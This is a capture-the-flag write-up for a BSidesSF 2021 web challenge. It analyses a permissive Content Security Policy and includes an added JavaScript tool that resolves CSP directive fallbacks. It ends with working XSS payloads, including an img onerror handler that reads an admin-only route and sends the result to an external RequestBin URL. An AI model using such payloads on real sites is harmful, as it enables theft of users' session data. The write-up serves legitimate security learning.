
See https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-1 for the version of this writeup with screenshots.


If we look at the Content Security Policy (CSP) for this page, we can see it is very permissive. To spot this, you can either learn what each directive does or paste the policy into a tool such as https://csp-evaluator.withgoogle.com/.

The CSP in this case was:

default-src 'self' 'unsafe-inline' 'unsafe-eval'; script-src-elem 'self'; connect-src *

The 'unsafe-inline' source in default-src is what lets inline script run. There is a subtlety worth understanding: script-src-elem 'self' governs <script> elements and does not include 'unsafe-inline', so an inline <script> block is refused. Inline event handler attributes such as onerror are governed by script-src-attr instead, which is absent here; it falls back through script-src (also absent) to default-src, where 'unsafe-inline' is present, so event handlers execute. In a browser that does not support script-src-elem the directive is ignored entirely and default-src governs all script, which is even more permissive. Finally, connect-src * lets fetch() reach any host, so nothing stops exfiltration.
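The following is an added example, not code from the original writeup: a small resolver for the CSP Level 3 directive fallback chain, run over the challenge policy to show why an inline <script> element is blocked while an inline onerror handler and a fetch() to an external host are allowed. It models only the fallback order and simple source matching; nonces, hashes and 'strict-dynamic' are deliberately not handled. The page origin https://csp-one.example and the RequestBin path used in the checks are assumptions for illustration.

```javascript
// Added example: resolve which CSP directive actually governs a request type
// and whether the challenge policy permits it. Not from the original writeup.
//
// Fallback order, per CSP Level 3:
//   script-src-elem -> script-src -> default-src   (governs <script> elements)
//   script-src-attr -> script-src -> default-src   (governs onerror=, onclick=, ...)
//   connect-src     -> default-src                 (governs fetch/XHR/WebSocket)
const FALLBACK = {
  "script-src-elem": ["script-src-elem", "script-src", "default-src"],
  "script-src-attr": ["script-src-attr", "script-src", "default-src"],
  "script-src": ["script-src", "default-src"],
  "connect-src": ["connect-src", "default-src"],
  "img-src": ["img-src", "default-src"],
};

// The policy quoted in the writeup.
const CHALLENGE_CSP =
  "default-src 'self' 'unsafe-inline' 'unsafe-eval'; script-src-elem 'self'; connect-src *";

// Parse "name src src; name src" into { name: [src, ...] }.
// CSP ignores repeated directives: the first occurrence wins.
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// Walk the fallback chain and return the directive that governs this
// request type plus its source list. sources === null means unrestricted.
function effectiveSources(directives, directive) {
  const chain = FALLBACK[directive] || [directive, "default-src"];
  for (const name of chain) {
    if (name in directives) return { governedBy: name, sources: directives[name] };
  }
  return { governedBy: null, sources: null };
}

function allowsInline(directives, directive) {
  const { sources } = effectiveSources(directives, directive);
  return sources === null || sources.includes("'unsafe-inline'");
}

// Match one source expression against a URL. Quoted keyword sources such as
// 'unsafe-inline' never match a URL; * matches any network scheme.
function matchesSource(source, url, pageOrigin) {
  const target = new URL(url);
  if (source === "*") return ["http:", "https:", "ws:", "wss:"].includes(target.protocol);
  if (source === "'self'") return target.origin === pageOrigin;
  if (source.startsWith("'")) return false;
  if (source.endsWith(":")) return target.protocol === source; // scheme-source, e.g. https:
  // host-source, optionally with a scheme prefix and a leading "*." wildcard
  const host = source.replace(/^[a-z]+:\/\//i, "").split("/")[0];
  if (host.startsWith("*.")) return target.hostname.endsWith(host.slice(1));
  return target.hostname === host;
}

function allowsUrl(directives, directive, url, pageOrigin) {
  const { sources } = effectiveSources(directives, directive);
  if (sources === null) return true;
  return sources.some((s) => matchesSource(s, url, pageOrigin));
}

// Summarise what a policy permits for the payload shapes discussed above.
// pageOrigin is assumed; the challenge's real origin is not on the page.
function analyse(policy, pageOrigin) {
  const csp = parseCsp(policy);
  return {
    inlineScriptElement: allowsInline(csp, "script-src-elem"), // <script>alert(1)</script>
    inlineEventHandler: allowsInline(csp, "script-src-attr"),  // <img src=x onerror=alert(1)>
    fetchToRequestBin: allowsUrl(csp, "connect-src", "https://requestbin.io/abc", pageOrigin),
  };
}

console.log(analyse(CHALLENGE_CSP, "https://csp-one.example"));
```

Running it prints inlineScriptElement false, inlineEventHandler true and fetchToRequestBin true, which is exactly the gap the img onerror payload slips through. Swapping in a policy like "default-src 'self'; script-src 'self'" makes all three false, since every chain then ends at a list with neither 'unsafe-inline' nor a wildcard host.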

Let's start with a simple XSS payload:

<img src=x onerror=alert(1) />

This already works. Now we only need to read the flag from the /csp-one-flag route in the admin's session and send it somewhere we can see it. fetch() handles both halves: the read is same-origin, and connect-src * permits the outbound request, so we use https://requestbin.io/ again as the receiver.

Here's the final payload submitted to the admin:

<img src=x onerror='fetch("/csp-one-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/yj1y96yj?x=" + t))' />

And we get a flag back on the RequestBin side:

CTF{Can_Send_Payloads}
Original writeup (https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-1).